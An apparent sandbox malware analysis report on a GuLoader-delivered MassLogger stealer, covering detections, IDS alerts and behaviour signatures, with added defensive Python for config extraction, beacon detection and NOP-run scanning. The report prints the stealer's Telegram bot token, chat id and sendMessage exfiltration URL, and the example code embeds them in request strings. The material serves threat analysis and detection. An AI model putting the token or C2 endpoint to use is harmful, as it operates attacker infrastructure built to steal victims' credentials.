
Windows Analysis Report
rXKfKM0T49.exe

Overview

General Information

Sample name: rXKfKM0T49.exe (renamed because the original name is a hash value)
Original sample name: 28d6a2e755f646875e1ed22b6e8443e074e2fa7730d4f202ffe21c48db789fad.exe
Analysis ID: 1588260
MD5: 948a8f01fca4eecddbcb1c20b26a0a53
SHA1: f1254c7c3a1051c4624072c07f725aa62ff4a316
SHA256: 28d6a2e755f646875e1ed22b6e8443e074e2fa7730d4f202ffe21c48db789fad
Tags: exe, GuLoader, user-adrian__luca

Detection

GuLoader, MassLogger RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager (disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • rXKfKM0T49.exe (PID: 5380, cmdline: "C:\Users\user\Desktop\rXKfKM0T49.exe", MD5: 948A8F01FCA4EECDDBCB1C20B26A0A53)
    • rXKfKM0T49.exe (PID: 1072, cmdline: "C:\Users\user\Desktop\rXKfKM0T49.exe", MD5: 948A8F01FCA4EECDDBCB1C20B26A0A53)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Telegram RAT: {"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
MassLogger: {"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
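The two configuration blobs above are the whole C2 story for this sample: a Telegram bot token and a chat id, with the bot API as the exfiltration channel. The following is an added example, not Joe Sandbox's configuration extractor and not code from the sample. It pulls Telegram tokens, API methods and chat ids out of a memory dump the way a triage script would, scanning both ASCII and UTF-16LE strings because MassLogger is a .NET binary and keeps its strings as UTF-16. The input is a constructed strings dump that embeds the token and chat id the report extracted from PID 1072; the "chat_id=" form, the API methods and the surrounding bytes are assumptions about layout, not the real dump.

```python
"""Recover a Telegram-bot exfiltration config from a memory dump.

Added example; this is not Joe Sandbox's configuration extractor and not code
from the sample. The input is a constructed strings dump that embeds the token
and chat id the report extracted from rXKfKM0T49.exe (PID 1072); the
"chat_id=" form and the surrounding bytes are assumptions, not the real layout.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Telegram bot tokens are "<numeric bot id>:<35-char secret>"; the API URL is
# https://api.telegram.org/bot<token>/<method>. Only the digits get a lookbehind
# guard, because in URLs the id directly follows the letters "bot".
TOKEN = r"\d{8,10}:[A-Za-z0-9_-]{35}"
TOKEN_RE = re.compile(rf"(?<!\d)({TOKEN})(?![A-Za-z0-9_-])")
METHOD_RE = re.compile(rf"/bot({TOKEN})/([A-Za-z]+)")
CHAT_RE = re.compile(r"chat_id=(-?\d{5,20})")

ASCII_RUN = re.compile(rb"[\x20-\x7e]{8,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")   # .NET keeps strings as UTF-16LE


def iter_strings(dump: bytes):
    """Printable runs, like `strings -a` plus `strings -el`."""
    for m in ASCII_RUN.finditer(dump):
        yield m.group().decode("ascii")
    for m in UTF16_RUN.finditer(dump):
        yield m.group().decode("utf-16-le")


@dataclass(frozen=True)
class TelegramConfig:
    token: str
    chat_ids: tuple[str, ...]
    methods: tuple[str, ...]   # API methods seen used with this token

    @property
    def bot_id(self) -> str:
        return self.token.split(":", 1)[0]

    def c2_url(self, method: str = "sendMessage") -> str:
        return f"https://api.telegram.org/bot{self.token}/{method}"


def extract_telegram_configs(dump: bytes) -> list[TelegramConfig]:
    """One config per distinct token; chat ids are reported alongside every token."""
    methods: dict[str, set[str]] = {}
    chats: set[str] = set()
    for s in iter_strings(dump):
        for tok in TOKEN_RE.findall(s):
            methods.setdefault(tok, set())
        for tok, method in METHOD_RE.findall(s):
            methods.setdefault(tok, set()).add(method)
        chats.update(CHAT_RE.findall(s))
    return [TelegramConfig(tok, tuple(sorted(chats)), tuple(sorted(m)))
            for tok, m in sorted(methods.items())]


REPORT_TOKEN = "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA"   # from the report's config
REPORT_CHAT_ID = "2065242915"                                     # from the report's config


def constructed_dump() -> bytes:
    """Stand-in for the PID-1072 region: UTF-16 strings as a .NET stealer would
    hold them, one ASCII request line, and non-string filler. Not the real dump."""
    managed = (f"https://api.telegram.org/bot{REPORT_TOKEN}/sendDocument\x00"
               f"chat_id={REPORT_CHAT_ID}\x00Exfil Mode: Telegram\x00").encode("utf-16-le")
    request = f"POST /bot{REPORT_TOKEN}/sendMessage HTTP/1.1\r\n".encode("ascii")
    filler = b"\x00" * 32 + bytes(range(256))
    return filler + managed + request + filler


if __name__ == "__main__":
    for cfg in extract_telegram_configs(constructed_dump()):
        print(cfg.bot_id, cfg.chat_ids, cfg.methods, cfg.c2_url())
```

The bot id (the digits before the colon) is the stable indicator: operators rotate chat ids and bot secrets, but the id ties every token for that bot together and is what you would hunt for in other dumps.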
Source | Rule | Description | Author | Strings
00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000000.00000002.1814401893.0000000003E6F000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000003.00000002.2624047215.00000000022BF000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
(3 further entries not shown in this extract)
            No Sigma rule has matched
Suricata alerts: SID 2057744, severity 1, Malware Command and Control Activity Detected, 192.168.2.9 -> 149.154.167.220:443, TCP (one alert per connection)
Timestamp | Source Port
2025-01-10T23:12:00.281914+0100 | 49977
2025-01-10T23:12:02.042849+0100 | 49979
2025-01-10T23:12:03.589477+0100 | 49981
2025-01-10T23:12:05.263746+0100 | 49983
2025-01-10T23:12:06.806211+0100 | 49985
2025-01-10T23:12:08.373482+0100 | 49987
2025-01-10T23:12:09.991034+0100 | 49989
2025-01-10T23:12:11.627973+0100 | 49992
2025-01-10T23:12:13.282728+0100 | 49994
2025-01-10T23:12:14.861651+0100 | 49996
2025-01-10T23:12:17.130510+0100 | 49998
2025-01-10T23:12:18.755647+0100 | 50000
2025-01-10T23:12:20.282175+0100 | 50002
2025-01-10T23:12:21.929004+0100 | 50004
2025-01-10T23:12:23.510404+0100 | 50006
2025-01-10T23:12:26.221835+0100 | 50008
2025-01-10T23:12:27.866639+0100 | 50010
2025-01-10T23:12:29.438612+0100 | 50012
2025-01-10T23:12:30.991536+0100 | 50014
2025-01-10T23:12:32.714699+0100 | 50016
2025-01-10T23:12:34.305790+0100 | 50018
2025-01-10T23:12:35.900793+0100 | 50020
2025-01-10T23:12:37.515075+0100 | 50022
2025-01-10T23:12:39.041100+0100 | 50024
2025-01-10T23:12:40.813386+0100 | 50026
2025-01-10T23:12:42.356372+0100 | 50028
2025-01-10T23:12:43.983727+0100 | 50030
2025-01-10T23:12:45.635718+0100 | 50032
2025-01-10T23:12:47.246674+0100 | 50034
2025-01-10T23:12:48.883420+0100 | 50036
2025-01-10T23:12:50.406858+0100 | 50038
2025-01-10T23:12:52.085861+0100 | 50040
2025-01-10T23:12:53.725174+0100 | 50042
2025-01-10T23:12:55.278857+0100 | 50044
2025-01-10T23:12:56.980269+0100 | 50046
2025-01-10T23:13:01.679383+0100 | 50048
Suricata alerts: SID 2803274, severity 2, Potentially Bad Traffic, 192.168.2.9 -> 132.226.247.73:80, TCP
Timestamp | Source Port
2025-01-10T23:11:52.664493+0100 | 49975
2025-01-10T23:11:59.398915+0100 | 49975
2025-01-10T23:12:01.242641+0100 | 49978
2025-01-10T23:12:02.789544+0100 | 49980
Suricata alerts: SID 2803270, severity 2, Potentially Bad Traffic, 192.168.2.9 -> 216.58.206.46:443, TCP
Timestamp | Source Port
2025-01-10T23:11:47.560964+0100 | 49972
Suricata alerts: SID 1810008, severity 1, Potentially Bad Traffic, 192.168.2.9 -> 149.154.167.220:443, TCP (one alert per connection)
Timestamp | Source Port
2025-01-10T23:12:00.055572+0100 | 49977
2025-01-10T23:12:01.813771+0100 | 49979
2025-01-10T23:12:03.365561+0100 | 49981
2025-01-10T23:12:04.932807+0100 | 49983
2025-01-10T23:12:06.599379+0100 | 49985
2025-01-10T23:12:08.162259+0100 | 49987
2025-01-10T23:12:09.776645+0100 | 49989
2025-01-10T23:12:11.295791+0100 | 49992
2025-01-10T23:12:12.996532+0100 | 49994
2025-01-10T23:12:14.599622+0100 | 49996
2025-01-10T23:12:16.206189+0100 | 49998
2025-01-10T23:12:18.465680+0100 | 50000
2025-01-10T23:12:20.069772+0100 | 50002
2025-01-10T23:12:21.674756+0100 | 50004
2025-01-10T23:12:23.301443+0100 | 50006
2025-01-10T23:12:25.862990+0100 | 50008
2025-01-10T23:12:27.550625+0100 | 50010
2025-01-10T23:12:29.219177+0100 | 50012
2025-01-10T23:12:30.766263+0100 | 50014
2025-01-10T23:12:32.422148+0100 | 50016
2025-01-10T23:12:34.024915+0100 | 50018
2025-01-10T23:12:35.619872+0100 | 50020
2025-01-10T23:12:37.213771+0100 | 50022
2025-01-10T23:12:38.823917+0100 | 50024
2025-01-10T23:12:40.369055+0100 | 50026
2025-01-10T23:12:42.142601+0100 | 50028
2025-01-10T23:12:43.684809+0100 | 50030
2025-01-10T23:12:45.322823+0100 | 50032
2025-01-10T23:12:46.956393+0100 | 50034
2025-01-10T23:12:48.591683+0100 | 50036
2025-01-10T23:12:50.197296+0100 | 50038
2025-01-10T23:12:51.750955+0100 | 50040
2025-01-10T23:12:53.422065+0100 | 50042
2025-01-10T23:12:55.063104+0100 | 50044
2025-01-10T23:12:56.595449+0100 | 50046
2025-01-10T23:13:01.340423+0100 | 50048
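The alert tables show the exfiltration rhythm: a fresh TCP connection from the infected host to 149.154.167.220:443 roughly every 1.6 seconds, each one hitting both the Emerging Threats rule (SID 2057744) and the Joe Security anomaly rule (SID 1810008). The block below is an added example, not part of the report and not Joe Security tooling. It transcribes a subset of the rows above into a pipe-delimited layout chosen here, groups the alerts per (SID, destination), measures the inter-arrival gaps and their jitter to decide whether a flow is beaconing, and lists which rules fired on each connection so that agreement between two independent rulesets is visible. The beaconing thresholds are assumptions a detection engineer would tune, not values from the report.

```python
"""Beacon analysis over the Suricata alert rows from this report.

Added example; it is not part of the Joe Sandbox report and not tooling from
Joe Security. ALERT_ROWS transcribes a subset of the report's alert tables
(timestamp, SID, severity, classtype, src, sport, dst, dport, proto) into a
pipe-delimited layout chosen here.
"""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime
from statistics import median, pstdev

ALERT_ROWS = """\
2025-01-10T23:12:00.281914+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49977 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:02.042849+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49979 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:03.589477+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49981 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:05.263746+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49983 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:06.806211+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49985 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:00.055572+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.9 | 49977 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:01.813771+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.9 | 49979 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:03.365561+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.9 | 49981 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:04.932807+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.9 | 49983 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:06.599379+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.9 | 49985 | 149.154.167.220 | 443 | TCP
2025-01-10T23:11:52.664493+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49975 | 132.226.247.73 | 80 | TCP
2025-01-10T23:11:59.398915+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49975 | 132.226.247.73 | 80 | TCP
2025-01-10T23:11:47.560964+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49972 | 216.58.206.46 | 443 | TCP
"""


@dataclass(frozen=True)
class Alert:
    ts: datetime
    sid: int
    severity: int
    src: str
    sport: int
    dst: str
    dport: int


def parse_rows(text: str) -> list[Alert]:
    """Parse the pipe-delimited rows; the classtype and protocol columns are not needed."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sev, _cls, src, sport, dst, dport, _proto = [c.strip() for c in line.split("|")]
        alerts.append(Alert(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
                            int(sid), int(sev), src, int(sport), dst, int(dport)))
    return alerts


@dataclass(frozen=True)
class FlowStats:
    sid: int
    dst: str
    dport: int
    count: int
    connections: int          # distinct source ports, i.e. distinct TCP connections
    median_gap_s: float | None
    jitter_s: float | None    # population stdev of the inter-arrival gaps


def flow_stats(alerts: list[Alert]) -> list[FlowStats]:
    """Per (SID, destination): hit count, connection count, median gap and jitter."""
    groups: dict[tuple[int, str, int], list[Alert]] = {}
    for a in alerts:
        groups.setdefault((a.sid, a.dst, a.dport), []).append(a)
    stats = []
    for (sid, dst, dport), items in sorted(groups.items()):
        items.sort(key=lambda a: a.ts)
        gaps = [(b.ts - a.ts).total_seconds() for a, b in zip(items, items[1:])]
        stats.append(FlowStats(sid, dst, dport, len(items), len({a.sport for a in items}),
                               median(gaps) if gaps else None,
                               pstdev(gaps) if len(gaps) > 1 else None))
    return stats


def is_beacon(f: FlowStats, min_hits: int = 4, max_rel_jitter: float = 0.25) -> bool:
    """Enough hits, a fresh connection for every hit, and gaps that barely vary.
    The thresholds are assumed starting points, not values from the report."""
    if f.count < min_hits or f.median_gap_s is None or f.jitter_s is None:
        return False
    return f.connections == f.count and f.jitter_s <= max_rel_jitter * f.median_gap_s


def sids_per_connection(alerts: list[Alert]) -> dict[tuple[str, int], tuple[int, ...]]:
    """Which rules fired on the same TCP connection, keyed by (src, sport)."""
    seen: dict[tuple[str, int], set[int]] = {}
    for a in alerts:
        seen.setdefault((a.src, a.sport), set()).add(a.sid)
    return {k: tuple(sorted(v)) for k, v in seen.items()}


if __name__ == "__main__":
    alerts = parse_rows(ALERT_ROWS)
    for f in flow_stats(alerts):
        print(f"SID {f.sid} -> {f.dst}:{f.dport}: {f.count} alerts on {f.connections} "
              f"connections, median gap {f.median_gap_s}, beacon={is_beacon(f)}")
```

On these rows the two Telegram flows come out as beacons (five hits, five connections, median gap about 1.6 s with low jitter), while the geolocation lookup to 132.226.247.73:80 does not: its two alerts share source port 49975, i.e. two HTTP requests on one keep-alive connection.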


            AV Detection

Source: rXKfKM0T49.exe | Avira: detected
Source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
Source: rXKfKM0T49.exe.1072.3.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
Source: rXKfKM0T49.exe | Virustotal: Detection: 75%
Source: rXKfKM0T49.exe | ReversingLabs: Detection: 78%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378AD1EC | CryptUnprotectData
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378AD9D9 | CryptUnprotectData
Source: rXKfKM0T49.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49976 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.9:49972 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.9:49974 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49977 version: TLS 1.2
Source: rXKfKM0T49.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 0_2_0040672B | FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 0_2_00405AFA | CloseHandle, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 0_2_00402868 | FindFirstFileW
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_00402868 | FindFirstFileW
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_0040672B | FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_00405AFA | CloseHandle, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378AC638 | 4x nop then jmp 378AC985h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378A0C28 | 4x nop then jmp 378A1042h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378A03C4 | 4x nop then jmp 378A0671h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378AE790 | 4x nop then jmp 378AEA48h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378A0F6F | 4x nop then jmp 378A1042h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378ADEE1 | 4x nop then jmp 378AE198h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378ABD9C | 4x nop then jmp 378AC041h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378AB4EC | 4x nop then jmp 378AB791h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378A0C1B | 4x nop then jmp 378A1042h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378AEBF2 | 4x nop then jmp 378AEEA0h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378AE339 | 4x nop then jmp 378AE5F0h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378ADA89 | 4x nop then jmp 378ADD40h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378AC1F2 | 4x nop then jmp 378AC499h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378AB930 | 4x nop then jmp 378ABBE9h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378AF054 | 4x nop then jmp 378AF2F8h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_378AB07F | 4x nop then jmp 378AB339h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384EBDF0 | 4x nop then push 00000000h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E8650 | 4x nop then jmp 384E882Dh
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E8650 | 4x nop then jmp 384E91B7h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E67C0 | 4x nop then jmp 384E6A68h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E1858 | 4x nop then jmp 384E1B00h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E7070 | 4x nop then jmp 384E7318h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E4820 | 4x nop then jmp 384E4ACAh
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E2108 | 4x nop then jmp 384E23B0h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384EC92F | 4x nop then push 00000000h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E8193 | 4x nop then mov dword ptr [ebp-14h], 00000000h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E29B8 | 4x nop then jmp 384E2C60h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E3268 | 4x nop then jmp 384E3510h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E5208 | 4x nop then jmp 384E54B0h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E5AB8 | 4x nop then jmp 384E5D60h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E6368 | 4x nop then jmp 384E6610h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E7B62 | 4x nop then mov dword ptr [ebp-14h], 00000000h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E8373 | 4x nop then mov dword ptr [ebp-14h], 00000000h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E3B18 | 4x nop then jmp 384E3DC0h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E43C8 | 4x nop then jmp 384E4670h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384ECBE7 | 4x nop then lea esp, dword ptr [ebp-04h]
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E1400 | 4x nop then jmp 384E16A8h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E6C18 | 4x nop then jmp 384E6EC0h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E74C8 | 4x nop then jmp 384E7770h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E1CB0 | 4x nop then jmp 384E1F58h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E2560 | 4x nop then jmp 384E2808h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E4DB0 | 4x nop then jmp 384E5058h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E5660 | 4x nop then jmp 384E5908h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E2E10 | 4x nop then jmp 384E30B8h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E36C0 | 4x nop then jmp 384E3968h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E3F70 | 4x nop then jmp 384E4218h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E5F10 | 4x nop then jmp 384E61B8h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_384E0FA8 | 4x nop then jmp 384E1250h
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 3_2_38A1E790 | 4x nop then push 00000000h
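The "4x nop then jmp" entries above are what the "Found inlined nop instructions" signature is built on: runs of 0x90 padding immediately followed by a branch or a push, which compilers rarely emit inside a function body but obfuscators and shellcode stubs do. The following is an added example of that scan, not Joe Sandbox's signature logic. It walks a code buffer for NOP runs of a configurable length, decodes the instruction that follows (jmp rel8/rel32, push imm8/imm32) and resolves jump targets to absolute addresses, rendering each hit in the report's wording. CONSTRUCTED_CODE is hand-built to reproduce one of the hits listed above (3_2_378AC638: 4x nop then jmp 378AC985h) together with a push variant and a below-threshold run; it is not bytes from the sample, and the mov/lea variants the report also lists are left to a real disassembler.

```python
"""Scan x86 code for the "4x nop then jmp/push" pattern the report lists above.

Added example; it is not Joe Sandbox's signature logic. CONSTRUCTED_CODE is a
hand-built byte string laid out to reproduce one of the report's hits
(3_2_378AC638: 4x nop then jmp 378AC985h); it is not bytes from the sample.
Only jmp rel8/rel32 and push imm8/imm32 are decoded.
"""
from __future__ import annotations

import struct

NOP = 0x90


def scan_inlined_nops(code: bytes, base: int, min_nops: int = 4) -> list[tuple[int, int, str, int]]:
    """Return (address, nop_count, mnemonic, operand) per qualifying NOP run.
    Jump operands are resolved to absolute targets: base + next_ip + rel."""
    hits = []
    i, n = 0, len(code)
    while i < n:
        if code[i] != NOP:
            i += 1
            continue
        j = i
        while j < n and code[j] == NOP:
            j += 1
        run = j - i
        if run >= min_nops and j < n:
            op = code[j]
            if op == 0xEB and j + 2 <= n:                 # jmp rel8
                rel = struct.unpack_from("<b", code, j + 1)[0]
                hits.append((base + i, run, "jmp", (base + j + 2 + rel) & 0xFFFFFFFF))
            elif op == 0xE9 and j + 5 <= n:               # jmp rel32
                rel = struct.unpack_from("<i", code, j + 1)[0]
                hits.append((base + i, run, "jmp", (base + j + 5 + rel) & 0xFFFFFFFF))
            elif op == 0x6A and j + 2 <= n:               # push imm8, sign-extended to 32 bits
                imm = struct.unpack_from("<b", code, j + 1)[0]
                hits.append((base + i, run, "push", imm & 0xFFFFFFFF))
            elif op == 0x68 and j + 5 <= n:               # push imm32
                hits.append((base + i, run, "push", struct.unpack_from("<I", code, j + 1)[0]))
        i = j
    return hits


def describe(hit: tuple[int, int, str, int]) -> str:
    """Render a hit in the wording the report uses, e.g. '4x nop then jmp 378AC985h'."""
    _addr, run, mnemonic, operand = hit
    return f"{run}x nop then {mnemonic} {operand:08X}h"


BASE = 0x378AC638          # function address taken from the report's first nop entry
CONSTRUCTED_CODE = bytes.fromhex(
    "55 8B EC "             # push ebp; mov ebp, esp
    "90 90 90 90 "          # 4x nop
    "E9 41 03 00 00 "       # jmp rel32 +0x341 -> 378AC985h
    "33 C0 "                # xor eax, eax
    "90 90 "                # 2x nop: below the threshold, ignored
    "C3 "                   # ret
    "90 90 90 90 90 "       # 5x nop
    "6A 00 "                # push 0
    "90 90 90 90 "          # 4x nop
    "EB 02 "                # jmp short +2 -> 378AC658h (over the next two nops)
    "90 90 "                # 2x nop
    "C3 "                   # ret
)

if __name__ == "__main__":
    for hit in scan_inlined_nops(CONSTRUCTED_CODE, BASE):
        print(f"{hit[0]:08X}: {describe(hit)}")
```

Run on a dumped code region with its load address as base, the scanner gives the same list the report shows; the threshold matters, since single or paired NOPs are normal alignment padding and only longer runs followed by control flow are worth flagging.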

            Networking

Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9 -> 149.154.167.220:443, one alert per connection, from source ports 49977, 49979, 49981, 49983, 49985, 49989, 49992, 49994, 49996, 49998, 50000, 50002, 50004, 50006, 50008, 50010, 50012, 50014, 50016, 50018, 50020, 50022, 50024, 50026, 50030, 50032, 50034, 50036, 50038, 50040, 50042, 50044, 50046, 50048 (34 alerts)
